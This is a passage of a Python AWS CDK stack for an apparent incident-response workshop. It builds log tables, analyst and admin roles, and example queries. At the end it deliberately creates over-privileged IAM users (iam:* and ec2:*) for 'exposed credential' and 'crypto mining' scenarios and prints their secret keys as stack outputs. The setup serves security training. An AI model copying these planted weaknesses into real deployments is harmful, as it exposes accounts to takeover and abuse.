| "projection.account_partition.values": Aws.ACCOUNT_ID, 238 | "storage.location.template": CloudTrailSource, 239 | } 240 | glue_table_cloudtrail_partition_keys = [ 241 | {"name": "date_partition", "type": "string"}, 242 | {"name": "region_partition", "type": "string"}, 243 | {"name": "account_partition", "type": "string"}, 244 | 245 | ] 246 | glue_table_cloudtrail_columns = [ 247 | {"name": "eventversion", "type": "string"}, 248 | {"name": "useridentity", "type": "struct,sessionissuer:struct>>"}, 253 | {"name": "eventtime", "type": "string"}, 254 | {"name": "eventsource", "type": "string"}, 255 | {"name": "eventname", "type": "string"}, 256 | {"name": "awsregion", "type": "string"}, 257 | {"name": "sourceipaddress", "type": "string"}, 258 | {"name": "useragent", "type": "string"}, 259 | {"name": "errorcode", "type": "string"}, 260 | {"name": "errormessage", "type": "string"}, 261 | {"name": "requestparameters", "type": "string"}, 262 | {"name": "responseelements", "type": "string"}, 263 | {"name": "additionaleventdata", "type": "string"}, 264 | {"name": "eventid", "type": "string"}, 265 | {"name": "resources", "type": "array>"}, 266 | {"name": "eventtype", "type": "string"}, 267 | {"name": "apiversion", "type": "string"}, 268 | {"name": "readonly", "type": "string"}, 269 | {"name": "recipientaccountid", "type": "string"}, 270 | {"name": "serviceeventdetails", "type": "string"}, 271 | {"name": "sharedeventid", "type": "string"}, 272 | {"name": "vpcendpointid", "type": "string"}, 273 | ] 274 | logs_location = "".join(["s3://", 275 | logging_bucket.bucket_name, 276 | "/AWSLogs/"]) 277 | CfnOutput( 278 | self, 279 | "S3BucketLocationWithLogs", 280 | description="S3 Bucket location containing CloudTrail, VPC Flow, and DNS logs for workshop use", 281 | value=logs_location, 282 | ) 283 | glue_table_cloudtrail = aws_glue.CfnTable( 284 | self, 285 | "IRWorkshopGlueTableCloudTrail", 286 | catalog_id=Aws.ACCOUNT_ID, 287 | database_name="irworkshopgluedatabase", 288 | table_input=aws_glue.CfnTable.TableInputProperty( 289 | name="irworkshopgluetablecloudtrail", 290 | table_type="EXTERNAL_TABLE", 291 | parameters=glue_table_cloudtrail_parameters, 292 | partition_keys=glue_table_cloudtrail_partition_keys, 293 | storage_descriptor=aws_glue.CfnTable.StorageDescriptorProperty( 294 | output_format="org.apache.hadoop.hive.ql.io.HiveIgnoreKeyTextOutputFormat", 295 | columns=glue_table_cloudtrail_columns, 296 | input_format="com.amazon.emr.cloudtrail.CloudTrailInputFormat", 297 | location=logs_location, 298 | serde_info=aws_glue.CfnTable.SerdeInfoProperty( 299 | parameters={"serialization.format": "1"}, 300 | serialization_library="com.amazon.emr.hive.serde.CloudTrailSerde", 301 | ), 302 | ) 303 | ), 304 | ) 305 | 306 | CfnParamVPCFlowProjectionEventStartDate = CfnParameter( 307 | self, 308 | "ParamVPCFlowProjectionEventStartDate", 309 | type="String", 310 | default="2021/06/14", 311 | description="Athena VPC Flow Table Projection Partition Start Date", 312 | ) 313 | VPCFlowProjectionDateRange = CfnParamVPCFlowProjectionEventStartDate.value_as_string + ", NOW" 314 | VPCFlowSource = "".join(["s3://", 315 | logging_bucket.bucket_name, 316 | "/AWSLogs/", 317 | "${account_partition}/vpcflowlogs/${region_partition}/${date_partition}"]) 318 | glue_table_vpcflow_parameters = { 319 | "classification": "csv", 320 | "EXTERNAL": "true", 321 | "projection.enabled": "true", 322 | "projection.date_partition.type": "date", 323 | "projection.date_partition.range": VPCFlowProjectionDateRange, 324 | "projection.date_partition.format": "yyyy/MM/dd", 325 | "projection.date_partition.interval": "1", 326 | "projection.date_partition.interval.unit": "DAYS", 327 | "projection.region_partition.type": "enum", 328 | "projection.region_partition.values": RegionPartitionValues, 329 | "projection.account_partition.type": "enum", 330 | "projection.account_partition.values": Aws.ACCOUNT_ID, 331 | "storage.location.template": VPCFlowSource, 332 | } 333 | glue_table_vpcflow_partition_keys = [ 334 | {"name": "date_partition", "type": "string"}, 335 | {"name": "region_partition", "type": "string"}, 336 | {"name": "account_partition", "type": "string"}, 337 | 338 | ] 339 | glue_table_vpcflow_columns = [ 340 | {"name": "version", "type": "int"}, 341 | {"name": "account", "type": "string"}, 342 | {"name": "interfaceid", "type": "string"}, 343 | {"name": "sourceaddress", "type": "string"}, 344 | {"name": "destinationaddress", "type": "string"}, 345 | {"name": "sourceport", "type": "int"}, 346 | {"name": "destinationport", "type": "int"}, 347 | {"name": "protocol", "type": "int"}, 348 | {"name": "numpackets", "type": "int"}, 349 | {"name": "numbytes", "type": "bigint"}, 350 | {"name": "starttime", "type": "int"}, 351 | {"name": "endtime", "type": "int"}, 352 | {"name": "action", "type": "string"}, 353 | {"name": "logstatus", "type": "string"}, 354 | {"name": "vpcid", "type": "string"}, 355 | {"name": "subnetid", "type": "string"}, 356 | {"name": "instanceid", "type": "string"}, 357 | {"name": "tcpflags", "type": "smallint"}, 358 | {"name": "type", "type": "string"}, 359 | {"name": "pktsrcaddr", "type": "string"}, 360 | {"name": "pktdstaddr", "type": "string"}, 361 | {"name": "region", "type": "string"}, 362 | {"name": "azid", "type": "string"}, 363 | {"name": "sublocationtype", "type": "string"}, 364 | {"name": "sublocationid", "type": "string"}, 365 | {"name": "pkt_src_aws_service", "type": "string"}, 366 | {"name": "pkt_dst_aws_service", "type": "string"}, 367 | {"name": "flow_direction", "type": "string"}, 368 | {"name": "traffic_path", "type": "string"}, 369 | ] 370 | logs_location = "".join(["s3://", 371 | logging_bucket.bucket_name, 372 | "/AWSLogs/"]) 373 | glue_table_vpcflow = aws_glue.CfnTable( 374 | self, 375 | "IRWorkshopGlueTableVPCFlow", 376 | catalog_id=Aws.ACCOUNT_ID, 377 | database_name="irworkshopgluedatabase", 378 | table_input=aws_glue.CfnTable.TableInputProperty( 379 | name="irworkshopgluetablevpcflow", 380 | table_type="EXTERNAL_TABLE", 381 | parameters=glue_table_vpcflow_parameters, 382 | partition_keys=glue_table_vpcflow_partition_keys, 383 | storage_descriptor=aws_glue.CfnTable.StorageDescriptorProperty( 384 | output_format="org.apache.hadoop.hive.ql.io.HiveIgnoreKeyTextOutputFormat", 385 | columns=glue_table_vpcflow_columns, 386 | input_format="org.apache.hadoop.mapred.TextInputFormat", 387 | location=logs_location, 388 | serde_info=aws_glue.CfnTable.SerdeInfoProperty( 389 | parameters={"serialization.format": "", 390 | "field.delim": " "}, 391 | serialization_library="org.apache.hadoop.hive.serde2.lazy.LazySimpleSerDe", 392 | ), 393 | ) 394 | ), 395 | ) 396 | CfnParamDNSProjectionEventStartDate = CfnParameter( 397 | self, 398 | "ParamDNSProjectionEventStartDate", 399 | type="String", 400 | default="2021/06/14", 401 | description="Athena DNS Table Projection Partition Start Date", 402 | ) 403 | DNSProjectionDateRange = CfnParamDNSProjectionEventStartDate.value_as_string + ", NOW" 404 | DNSSource = "".join(["s3://", 405 | logging_bucket.bucket_name, 406 | "/AWSLogs/", 407 | "${account_partition}/vpcdnsquerylogs/${vpc_partition}/${date_partition}"]) 408 | glue_table_dns_parameters = { 409 | "classification": "csv", 410 | "EXTERNAL": "true", 411 | "projection.enabled": "true", 412 | "projection.date_partition.type": "date", 413 | "projection.date_partition.range": DNSProjectionDateRange, 414 | "projection.date_partition.format": "yyyy/MM/dd", 415 | "projection.date_partition.interval": "1", 416 | "projection.date_partition.interval.unit": "DAYS", 417 | "projection.vpc_partition.type": "enum", 418 | "projection.vpc_partition.values": vpc.vpc_id, 419 | "projection.account_partition.type": "enum", 420 | "projection.account_partition.values": Aws.ACCOUNT_ID, 421 | "storage.location.template": DNSSource, 422 | } 423 | glue_table_dns_partition_keys = [ 424 | {"name": "date_partition", "type": "string"}, 425 | {"name": "vpc_partition", "type": "string"}, 426 | {"name": "account_partition", "type": "string"}, 427 | 428 | ] 429 | glue_table_dns_columns = [ 430 | {"name": "version", "type": "float"}, 431 | {"name": "account_id", "type": "string"}, 432 | {"name": "region", "type": "string"}, 433 | {"name": "vpc_id", "type": "string"}, 434 | {"name": "query_timestamp", "type": "string"}, 435 | {"name": "query_name", "type": "string"}, 436 | {"name": "query_type", "type": "string"}, 437 | {"name": "query_class", "type": "string"}, 438 | {"name": "rcode", "type": "string"}, 439 | {"name": "answers", "type": "array"}, 440 | {"name": "srcaddr", "type": "string"}, 441 | {"name": "srcport", "type": "int"}, 442 | {"name": "transport", "type": "string"}, 443 | {"name": "srcids", "type": "string"}, 444 | ] 445 | glue_table_dns = aws_glue.CfnTable( 446 | self, 447 | "IRWorkshopGlueTableDNS", 448 | catalog_id=Aws.ACCOUNT_ID, 449 | database_name="irworkshopgluedatabase", 450 | table_input=aws_glue.CfnTable.TableInputProperty( 451 | name="irworkshopgluetabledns", 452 | table_type="EXTERNAL_TABLE", 453 | parameters=glue_table_dns_parameters, 454 | partition_keys=glue_table_dns_partition_keys, 455 | storage_descriptor=aws_glue.CfnTable.StorageDescriptorProperty( 456 | output_format="org.apache.hadoop.hive.ql.io.HiveIgnoreKeyTextOutputFormat", 457 | columns=glue_table_dns_columns, 458 | input_format="org.apache.hadoop.mapred.TextInputFormat", 459 | location=logs_location, 460 | serde_info=aws_glue.CfnTable.SerdeInfoProperty( 461 | parameters={"serialization.format": ""}, 462 | serialization_library="org.openx.data.jsonserde.JsonSerDe", 463 | ), 464 | ) 465 | ), 466 | ) 467 | 468 | CfnParamBasePrincipal = CfnParameter( 469 | self, 470 | "ParamBasePrincipal", 471 | type="String", 472 | default="role/WSParticipantRole", 473 | description="".join(["IAM Principal to assume Security roles ", 474 | "(usage: IAM User - prefix with user/, IAM Role - prefix with role/)"]), 475 | ) 476 | 477 | security_analyst_role_policy = aws_iam.ManagedPolicy( 478 | self, 479 | "SecurityAnalystRolePolicy", 480 | statements=[ 481 | aws_iam.PolicyStatement( 482 | sid="SecurityNamedQueryFullAccess", 483 | effect=aws_iam.Effect.ALLOW, 484 | actions=["athena:BatchGetNamedQuery", 485 | "athena:CreateNamedQuery", 486 | "athena:DeleteNamedQuery", 487 | "athena:GetNamedQuery", 488 | "athena:ListNamedQueries"], 489 | resources=["".join(["arn:aws:athena:", Aws.REGION, ":", Aws.ACCOUNT_ID, 490 | ":workgroup/", athena_workgroup.name])] 491 | ), 492 | aws_iam.PolicyStatement( 493 | sid="SecurityWorkgroupReadOnly", 494 | effect=aws_iam.Effect.ALLOW, 495 | actions=["athena:GetWorkGroup", 496 | "athena:ListWorkGroups", 497 | "athena:BatchGetQueryExecution", 498 | "athena:GetQueryExecution", 499 | "athena:GetQueryResults", 500 | "athena:GetQueryResultsStream", 501 | "athena:ListQueryExecutions", 502 | "athena:ListTagsForResource", 503 | "athena:StartQueryExecution", 504 | "athena:StopQueryExecution"], 505 | resources=["".join(["arn:aws:athena:", Aws.REGION, ":", Aws.ACCOUNT_ID, 506 | ":workgroup/", athena_workgroup.name])] 507 | ), 508 | aws_iam.PolicyStatement( 509 | sid="SecurityWorkgroupListAll", 510 | effect=aws_iam.Effect.ALLOW, 511 | actions=["athena:ListWorkGroups"], 512 | resources=["*"] 513 | ), 514 | aws_iam.PolicyStatement( 515 | sid="SecurityAthenaDataCatalogReadOnly", 516 | effect=aws_iam.Effect.ALLOW, 517 | actions=["athena:GetDataCatalog", 518 | "athena:ListDataCatalogs", 519 | "athena:GetCatalogImportStatus", 520 | "athena:GetDatabase", 521 | "athena:ListDatabases", 522 | "athena:GetTableMetadata", 523 | "athena:ListTableMetadata"], 524 | resources=["".join(["arn:aws:athena:", Aws.REGION, ":", Aws.ACCOUNT_ID, 525 | ":datacatalog/", athena_workgroup.name])] 526 | ), 527 | aws_iam.PolicyStatement( 528 | sid="SecurityGlueDatabaseReadOnly", 529 | effect=aws_iam.Effect.ALLOW, 530 | actions=["glue:GetDatabase", 531 | "glue:GetDatabases"], 532 | resources=["".join(["arn:aws:glue:", Aws.REGION, ":", Aws.ACCOUNT_ID, 533 | ":database/", glue_database.database_input.name]), 534 | "".join(["arn:aws:glue:", Aws.REGION, ":", Aws.ACCOUNT_ID, 535 | ":catalog"]) 536 | ] 537 | ), 538 | aws_iam.PolicyStatement( 539 | sid="SecurityGlueTableReadOnly", 540 | effect=aws_iam.Effect.ALLOW, 541 | actions=["glue:GetTable", 542 | "glue:GetTables"], 543 | resources=["".join(["arn:aws:glue:", Aws.REGION, ":", Aws.ACCOUNT_ID, 544 | ":table/", glue_database.database_input.name, "/*"]), 545 | "".join(["arn:aws:glue:", Aws.REGION, ":", Aws.ACCOUNT_ID, 546 | ":database/", glue_database.database_input.name]), 547 | "".join(["arn:aws:glue:", Aws.REGION, ":", Aws.ACCOUNT_ID, 548 | ":catalog"]) 549 | ] 550 | ), 551 | aws_iam.PolicyStatement( 552 | sid="SecurityGluePartitionReadOnly", 553 | effect=aws_iam.Effect.ALLOW, 554 | actions=["glue:BatchGetPartition", 555 | "glue:GetPartition", 556 | "glue:GetPartitions"], 557 | resources=["".join(["arn:aws:glue:", Aws.REGION, ":", Aws.ACCOUNT_ID, 558 | ":database/", athena_workgroup.name])] 559 | ), 560 | aws_iam.PolicyStatement( 561 | sid="AthenaOutputBucketReadWrite", 562 | effect=aws_iam.Effect.ALLOW, 563 | actions=["s3:AbortMultipartUpload", 564 | "s3:GetBucketLocation", 565 | "s3:GetObject", 566 | "s3:ListBucket", 567 | "s3:ListBucketMultipartUploads", 568 | "s3:ListMultipartUploadParts", 569 | "s3:PutObject"], 570 | resources=[athena_bucket.bucket_arn, 571 | athena_bucket.bucket_arn + "/*"] 572 | ), 573 | aws_iam.PolicyStatement( 574 | sid="LogSourceBucketReadOnly", 575 | effect=aws_iam.Effect.ALLOW, 576 | actions=["s3:GetObject", 577 | "s3:ListBucket"], 578 | resources=[logging_bucket.bucket_arn, 579 | logging_bucket.bucket_arn + "/*"] 580 | ), 581 | aws_iam.PolicyStatement( 582 | sid="ListLogAndOutputBuckets", 583 | effect=aws_iam.Effect.ALLOW, 584 | actions=["s3:GetBucketLocation", 585 | "s3:ListBucket"], 586 | resources=[logging_bucket.bucket_arn, 587 | athena_bucket.bucket_arn] 588 | ), 589 | aws_iam.PolicyStatement( 590 | sid="CloudShellPermissions", 591 | effect=aws_iam.Effect.ALLOW, 592 | actions=["cloudshell:*"], 593 | resources=["*"] 594 | ), 595 | ] 596 | ) 597 | 598 | security_analyst_role = aws_iam.Role( 599 | self, 600 | "SecurityAnalystRole", 601 | role_name="SecurityAnalystRole", 602 | managed_policies=[security_analyst_role_policy, 603 | aws_iam.ManagedPolicy.from_aws_managed_policy_name("ReadOnlyAccess")], 604 | assumed_by=aws_iam.AccountPrincipal( 605 | account_id=Aws.ACCOUNT_ID 606 | ).with_conditions( 607 | {"StringEquals": { 608 | "aws:PrincipalArn": [ 609 | "arn:aws:iam::" + Aws.ACCOUNT_ID + ":" + CfnParamBasePrincipal.value_as_string 610 | ] 611 | } 612 | } 613 | ) 614 | ) 615 | CfnOutput( 616 | self, 617 | "SecurityAnalystRoleARNforAthena", 618 | description="Role ARN to be assumed by security analyst for Athena use", 619 | value=security_analyst_role.role_arn, 620 | ) 621 | 622 | athena_admin_role_policy = aws_iam.ManagedPolicy( 623 | self, 624 | "AthenaAdminRolePolicy", 625 | statements=[ 626 | aws_iam.PolicyStatement( 627 | sid="SecurityNamedQueryFullAccess", 628 | effect=aws_iam.Effect.ALLOW, 629 | actions=["athena:BatchGetNamedQuery", 630 | "athena:CreateNamedQuery", 631 | "athena:DeleteNamedQuery", 632 | "athena:GetCatalogImportStatus", 633 | "athena:GetNamedQuery", 634 | "athena:ListNamedQueries"], 635 | resources=["".join(["arn:aws:athena:", Aws.REGION, ":", Aws.ACCOUNT_ID, 636 | ":workgroup/*"]) 637 | ] 638 | ), 639 | aws_iam.PolicyStatement( 640 | sid="SecurityWorkgroupFullAccess", 641 | effect=aws_iam.Effect.ALLOW, 642 | actions=["athena:CreateWorkGroup", 643 | "athena:DeleteWorkGroup", 644 | "athena:GetWorkGroup", 645 | "athena:ListWorkGroups", 646 | "athena:UpdateWorkGroup", 647 | "athena:BatchGetQueryExecution", 648 | "athena:GetQueryExecution", 649 | "athena:GetQueryResults", 650 | "athena:GetQueryResultsStream", 651 | "athena:ListQueryExecutions", 652 | "athena:ListTagsForResource", 653 | "athena:StartQueryExecution", 654 | "athena:StopQueryExecution"], 655 | resources=["".join(["arn:aws:athena:", Aws.REGION, ":", Aws.ACCOUNT_ID, 656 | ":workgroup/*"]) 657 | ] 658 | ), 659 | aws_iam.PolicyStatement( 660 | sid="SecurityAthenaDataCatalogFullAccess", 661 | effect=aws_iam.Effect.ALLOW, 662 | actions=["athena:CreateDataCatalog", 663 | "athena:DeleteDataCatalog", 664 | "athena:GetDataCatalog", 665 | "athena:ListDataCatalogs", 666 | "athena:UpdateDataCatalog", 667 | "athena:GetDatabase", 668 | "athena:ListDatabases", 669 | "athena:GetTableMetadata", 670 | "athena:ListTableMetadata"], 671 | resources=["".join(["arn:aws:athena:", Aws.REGION, ":", Aws.ACCOUNT_ID, 672 | ":datacatalog/*"]) 673 | ] 674 | ), 675 | aws_iam.PolicyStatement( 676 | sid="SecurityGlueDatabaseFullAccess", 677 | effect=aws_iam.Effect.ALLOW, 678 | actions=["glue:CreateDatabase", 679 | "glue:DeleteDatabase", 680 | "glue:GetDatabase", 681 | "glue:GetDatabases", 682 | "glue:UpdateDatabase"], 683 | resources=["".join(["arn:aws:glue:", Aws.REGION, ":", Aws.ACCOUNT_ID, 684 | ":database/*"]), 685 | "".join(["arn:aws:glue:", Aws.REGION, ":", Aws.ACCOUNT_ID, 686 | ":catalog"]) 687 | ] 688 | ), 689 | aws_iam.PolicyStatement( 690 | sid="SecurityGlueTableFullAccess", 691 | effect=aws_iam.Effect.ALLOW, 692 | actions=["glue:BatchDeleteTable", 693 | "glue:CreateTable", 694 | "glue:DeleteTable", 695 | "glue:GetTables", 696 | "glue:GetTable", 697 | "glue:UpdateTable"], 698 | resources=["".join(["arn:aws:glue:", Aws.REGION, ":", Aws.ACCOUNT_ID, 699 | ":table/*"]), 700 | "".join(["arn:aws:glue:", Aws.REGION, ":", Aws.ACCOUNT_ID, 701 | ":database/*"]), 702 | "".join(["arn:aws:glue:", Aws.REGION, ":", Aws.ACCOUNT_ID, 703 | ":catalog"]) 704 | ] 705 | ), 706 | aws_iam.PolicyStatement( 707 | sid="SecurityGluePartitionReadWrite", 708 | effect=aws_iam.Effect.ALLOW, 709 | actions=["glue:BatchCreatePartition", 710 | "glue:BatchDeletePartition", 711 | "glue:BatchGetPartition", 712 | "glue:CreatePartition", 713 | "glue:DeletePartition", 714 | "glue:GetPartitions", 715 | "glue:BatchGetPartition", 716 | "glue:UpdatePartition"], 717 | resources=["".join(["arn:aws:glue:", Aws.REGION, ":", Aws.ACCOUNT_ID, 718 | ":database/*"])] 719 | ), 720 | aws_iam.PolicyStatement( 721 | sid="AthenaOutputBucketReadWrite", 722 | effect=aws_iam.Effect.ALLOW, 723 | actions=["s3:AbortMultipartUpload", 724 | "s3:GetBucketLocation", 725 | "s3:GetObject", 726 | "s3:ListBucket", 727 | "s3:ListBucketMultipartUploads", 728 | "s3:ListMultipartUploadParts", 729 | "s3:PutObject"], 730 | resources=[athena_bucket.bucket_arn, 731 | athena_bucket.bucket_arn + "/*"] 732 | ), 733 | aws_iam.PolicyStatement( 734 | sid="LogSourceBucketReadOnly", 735 | effect=aws_iam.Effect.ALLOW, 736 | actions=["s3:GetObject", 737 | "s3:ListBucket"], 738 | resources=[logging_bucket.bucket_arn, 739 | logging_bucket.bucket_arn + "/*"] 740 | ), 741 | aws_iam.PolicyStatement( 742 | sid="ListLogAndOutputBuckets", 743 | effect=aws_iam.Effect.ALLOW, 744 | actions=["s3:GetBucketLocation", 745 | "s3:ListBucket", 746 | "s3:ListAllMyBuckets"], 747 | resources=[logging_bucket.bucket_arn, 748 | athena_bucket.bucket_arn] 749 | ), 750 | aws_iam.PolicyStatement( 751 | sid="CloudShellPermissions", 752 | effect=aws_iam.Effect.ALLOW, 753 | actions=["cloudshell:*"], 754 | resources=["*"] 755 | ), 756 | ] 757 | ) 758 | 759 | athena_admin_role = aws_iam.Role( 760 | self, 761 | "AthenaAdminRole", 762 | role_name="SecurityAdminRole", 763 | managed_policies=[athena_admin_role_policy], 764 | assumed_by=aws_iam.AccountPrincipal( 765 | account_id=Aws.ACCOUNT_ID 766 | ).with_conditions( 767 | {"StringEquals": { 768 | "aws:PrincipalArn": [ 769 | "arn:aws:iam::" + Aws.ACCOUNT_ID + ":" + CfnParamBasePrincipal.value_as_string 770 | ] 771 | } 772 | } 773 | ) 774 | ) 775 | 776 | CfnOutput( 777 | self, 778 | "AthenaAdminRoleARN", 779 | description="Role ARN to be assumed by Athena administrator", 780 | value=athena_admin_role.role_arn, 781 | ) 782 | 783 | security_break_glass_role = aws_iam.Role( 784 | self, 785 | "SecurityBreakGlassRole", 786 | role_name="SecurityBreakGlassRole", 787 | managed_policies=[aws_iam.ManagedPolicy.from_aws_managed_policy_name("AdministratorAccess")], 788 | assumed_by=aws_iam.AccountPrincipal( 789 | account_id=Aws.ACCOUNT_ID 790 | ).with_conditions( 791 | {"StringEquals": { 792 | "aws:PrincipalArn": [ 793 | "arn:aws:iam::" + Aws.ACCOUNT_ID + ":" + CfnParamBasePrincipal.value_as_string 794 | ] 795 | } 796 | } 797 | ) 798 | ) 799 | 800 | CfnOutput( 801 | self, 802 | "SecurityBreakGlassRoleArn", 803 | description="Role ARN for Break Glass purposes during incidents", 804 | value=security_break_glass_role.role_arn, 805 | ) 806 | 807 | security_deploy_role_policy = aws_iam.ManagedPolicy( 808 | self, 809 | "SecurityDeployRolePolicy", 810 | statements=[ 811 | aws_iam.PolicyStatement( 812 | sid="StackPermissions", 813 | effect=aws_iam.Effect.ALLOW, 814 | actions=["cloudformation:CreateStack", 815 | "cloudformation:DescribeStacks", 816 | "cloudformation:DescribeStackEvents", 817 | "cloudformation:DescribeStackResources", 818 | "cloudformation:GetTemplate", 819 | "cloudformation:GetTemplateSummary", 820 | "cloudformation:ListStacks", 821 | "cloudformation:ValidateTemplate", 822 | "cloudformation:CreateUploadBucket"], 823 | resources=["*"] 824 | ), 825 | aws_iam.PolicyStatement( 826 | sid="CloudShellPermissions", 827 | effect=aws_iam.Effect.ALLOW, 828 | actions=["cloudshell:*"], 829 | resources=["*"] 830 | ), 831 | aws_iam.PolicyStatement( 832 | sid="S3Permissions", 833 | effect=aws_iam.Effect.ALLOW, 834 | actions=["s3:PutObject", 835 | "s3:ListBucket", 836 | "s3:GetObject", 837 | "s3:CreateBucket"], 838 | resources=["*"] 839 | ), 840 | aws_iam.PolicyStatement( 841 | sid="IAMPermissions", 842 | effect=aws_iam.Effect.ALLOW, 843 | actions=["iam:CreateUser", 844 | "iam:CreatePolicy", 845 | "iam:CreateAccessKey", 846 | "iam:GetUser", 847 | "iam:GetPolicy", 848 | "iam:CreateServiceLinkedRole", 849 | "iam:PutRolePolicy", 850 | "iam:DeleteRolePolicy"], 851 | resources=["*"] 852 | ), 853 | aws_iam.PolicyStatement( 854 | sid="GuardDutyAdmin", 855 | effect=aws_iam.Effect.ALLOW, 856 | actions=["guardduty:*"], 857 | resources=["*"] 858 | ) 859 | ] 860 | ) 861 | 862 | security_deploy_role = aws_iam.Role( 863 | self, 864 | "SecurityDeployRole", 865 | role_name="SecurityDeployRole", 866 | managed_policies=[security_deploy_role_policy], 867 | assumed_by=aws_iam.AccountPrincipal( 868 | account_id=Aws.ACCOUNT_ID 869 | ).with_conditions( 870 | {"StringEquals": { 871 | "aws:PrincipalArn": [ 872 | "arn:aws:iam::" + Aws.ACCOUNT_ID + ":" + CfnParamBasePrincipal.value_as_string 873 | ] 874 | } 875 | } 876 | ) 877 | ) 878 | 879 | CfnOutput( 880 | self, 881 | "SecurityDeployRoleArn", 882 | description="Role ARN to be assumed for resource deployment", 883 | value=security_deploy_role.role_arn, 884 | ) 885 | 886 | with open("analytics/cloudtrail/cloudtrail_demo_queries.sql") as f: 887 | sql_string = f.read() 888 | f.close() 889 | cloudtrail_queries = aws_athena.CfnNamedQuery( 890 | self, 891 | "CloudTrailQueries", 892 | database=glue_database.database_input.name, 893 | work_group=athena_workgroup.name, 894 | description="Example CloudTrail Athena Queries", 895 | name="CloudTrailExampleQueries", 896 | query_string=sql_string, 897 | ) 898 | cloudtrail_queries.add_dependency(athena_workgroup) 899 | cloudtrail_queries.add_dependency(glue_database) 900 | 901 | with open("analytics/dns/dns_demo_queries.sql") as f: 902 | sql_string = f.read() 903 | f.close() 904 | dns_queries = aws_athena.CfnNamedQuery( 905 | self, 906 | "DNSQueries", 907 | database=glue_database.database_input.name, 908 | work_group=athena_workgroup.name, 909 | description="Example DNS Athena Queries", 910 | name="DNSExampleQueries", 911 | query_string=sql_string, 912 | ) 913 | dns_queries.add_dependency(athena_workgroup) 914 | dns_queries.add_dependency(glue_database) 915 | 916 | with open("analytics/vpcflow/vpcflow_demo_queries.sql") as f: 917 | sql_string = f.read() 918 | f.close() 919 | vpcflow_queries = aws_athena.CfnNamedQuery( 920 | self, 921 | "vpcflowQueries", 922 | database=glue_database.database_input.name, 923 | work_group=athena_workgroup.name, 924 | description="Example VPC Flow Athena Queries", 925 | name="VPCFlowExampleQueries", 926 | query_string=sql_string, 927 | ) 928 | vpcflow_queries.add_dependency(athena_workgroup) 929 | vpcflow_queries.add_dependency(glue_database) 930 | 931 | exposed_credential_policy = aws_iam.ManagedPolicy( 932 | self, 933 | "SystemIntegrationPolicy", 934 | statements=[ 935 | aws_iam.PolicyStatement( 936 | sid="AllowIAM", 937 | effect=aws_iam.Effect.ALLOW, 938 | actions=["iam:*"], 939 | resources=["*"] 940 | ) 941 | ] 942 | ) 943 | 944 | exposed_credential = aws_iam.User( 945 | self, 946 | "CredentialExposure", 947 | user_name="integration", 948 | managed_policies=[exposed_credential_policy], 949 | ) 950 | 951 | exposed_credential_access_key = aws_iam.CfnAccessKey( 952 | self, 953 | "CredentialExposureAccessKey", 954 | user_name=exposed_credential.user_name, 955 | serial=None, 956 | status="Active", 957 | ) 958 | 959 | CfnOutput( 960 | self, 961 | "CredentialExposureAccessKeySecret", 962 | description="IAM user access key secret for exposed credential scenario", 963 | value=exposed_credential_access_key.attr_secret_access_key, 964 | ) 965 | 966 | CfnOutput( 967 | self, 968 | "CredentialExposureAccessKeyId", 969 | description="IAM user access key id for exposed credential scenario", 970 | value=exposed_credential_access_key.ref, 971 | ) 972 | 973 | crypto_mining_credential_policy = aws_iam.ManagedPolicy( 974 | self, 975 | "CryptoMiningPolicy", 976 | statements=[ 977 | aws_iam.PolicyStatement( 978 | sid="AllowEC2", 979 | effect=aws_iam.Effect.ALLOW, 980 | actions=["ec2:*"], 981 | resources=["*"] 982 | ) 983 | ] 984 | ) 985 | 986 | crypto_mining_credential = aws_iam.User( 987 | self, 988 | "CryptoMiningCredential", 989 | user_name="pipeline", 990 | managed_policies=[crypto_mining_credential_policy], 991 | ) 992 | 993 | crypto_mining_credential_access_key = aws_iam.CfnAccessKey( 994 | self, 995 | "CryptoMiningAccessKey", 996 | user_name=crypto_mining_credential.user_name, 997 | serial=None, 998 | status="Active", 999 | ) 1000 | 1001 | CfnOutput( 1002 | self, 1003 | "CryptoMiningAccessKeySecret", 1004 | description="IAM user access key secret for crypto mining scenario", 1005 | value=crypto_mining_credential_access_key.attr_secret_access_key, 1006 | ) 1007 | 1008 | CfnOutput( 1009 | self, 1010 | "CryptoMiningAccessKeyId", 1011 | description="IAM user access key id for crypto mining scenario", 1012 | value=crypto_mining_credential_access_key.ref, 1013 | ) --------------------------------------------------------------------------------